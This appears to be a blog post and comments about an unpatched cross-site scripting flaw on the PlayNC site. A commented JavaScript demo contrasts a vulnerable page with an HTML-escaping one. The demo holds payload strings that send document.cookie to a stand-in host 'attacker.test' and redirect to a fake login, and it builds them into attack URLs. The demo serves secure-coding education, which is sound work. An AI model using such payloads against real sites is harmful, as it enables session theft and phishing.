A lot of people don't know much about scripting beyond installing what the instructions tell us to. Phrases like "SQL injection attacks" or "properly sanitizing" your database make us blink a few times and go "huh?" And updating to the latest version of something we painstakingly installed seems like a waste of time. After all, who'd want to hack your
Comments 3
They are fixing it 'soon' apparently, but it's a gaping hole for such a large company to still have unpatched, and what makes it worse is that it took a community member posting it on a fansite before it got addressed.
The security flaw is that their script will echo the HTML/JavaScript directly into your browser. With this, a malicious user could steal a session from a user, or, as in the first example, redirect the unsuspecting user to another webpage in the context of the plaync website (phishing).
The link to the login site in the thread is a fake? Or is it an actual link to the PlayNC login but unsecured, enabling someone to steal the account information? Oooor is it like a script executed via the URL that can send your information to another site? OOOOR it has something to do with URL-generated security sessions? I'm learning slowly here. A friend said the last one is a pretty common mistake, sadly; some government site did it and I think it happened to Facebook or MySpace as well, enabling people to access private pictures and posts.
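The flaw described in the comment above (a page that echoes attacker-supplied HTML/JavaScript straight back into the browser) is reflected cross-site scripting. The following is an added example, not code from the original post or from the site being discussed: a toy page that renders a search parameter the vulnerable way and the hardened way, the two constructed payloads that correspond to the comment's session-theft and phishing-redirect outcomes, and a check that the script only survives into the vulnerable rendering. The hostnames (`vulnerable.test`, `attacker.test`), the `q` parameter and all function names are hypothetical.

```javascript
// Added example (not from the original post or the site it discusses):
// a minimal reflected-XSS demonstration. The "search" page below echoes a
// query parameter straight into its HTML, which is the flaw the comment
// describes. Hostnames and parameter names are hypothetical.

// Vulnerable: the untrusted value is concatenated into the page as-is.
function renderVulnerable(query) {
  return `<html><body><h1>Results for ${query}</h1></body></html>`;
}

// Hardened: escape the five HTML-significant characters before the value
// reaches the document, so a payload is displayed as text, not executed.
// (This encoding is right for HTML text content; attribute, JavaScript and
// URL contexts each need their own encoding.)
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

function renderSafe(query) {
  return `<html><body><h1>Results for ${escapeHtml(query)}</h1></body></html>`;
}

// Constructed attacker payloads matching the two outcomes in the comment:
// 1. session theft: ship document.cookie to an attacker-controlled host
// 2. phishing: redirect the victim while the link they clicked looked
//    like it belonged to the trusted site
const PAYLOADS = {
  sessionTheft:
    '<script>new Image().src="https://attacker.test/c?"' +
    '+encodeURIComponent(document.cookie)</script>',
  phishingRedirect:
    '<script>location.href="https://attacker.test/login"</script>',
};

// Did a live <script> element survive into the rendered page? A regex is
// enough for this demo; a real scanner would parse the HTML instead.
function containsLiveScript(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html);
}

// The link a victim would be sent. The payload rides in the URL, which is
// what makes the attack "reflected": nothing is stored on the server.
function attackUrl(payload) {
  const u = new URL('https://vulnerable.test/search');
  u.searchParams.set('q', payload);
  return u.toString();
}

// Server side of the round trip: pull the parameter back out of the URL
// (URLSearchParams decodes it) and hand it to the chosen renderer.
function handleRequest(url, render) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return render(q);
}

// Run both payloads through both renderers and report whether the script
// reached the page. Expected: vulnerable=true, hardened=false for each.
function demo() {
  const results = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    const url = attackUrl(payload);
    results[name] = {
      vulnerable: containsLiveScript(handleRequest(url, renderVulnerable)),
      hardened: containsLiveScript(handleRequest(url, renderSafe)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

Two practical caveats: marking the session cookie `HttpOnly` keeps `document.cookie` out of the first payload's reach but does nothing against the redirect, and the script can still act on the user's behalf from inside the page, so output encoding at the point of rendering (plus a Content-Security-Policy) is the actual fix, not cookie flags alone.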
I'm not entirely sure myself how XSS works, but it's detailed in the XSS Wiki page (I think someone linked to it in that original thread; it does a better job of explaining it than I will).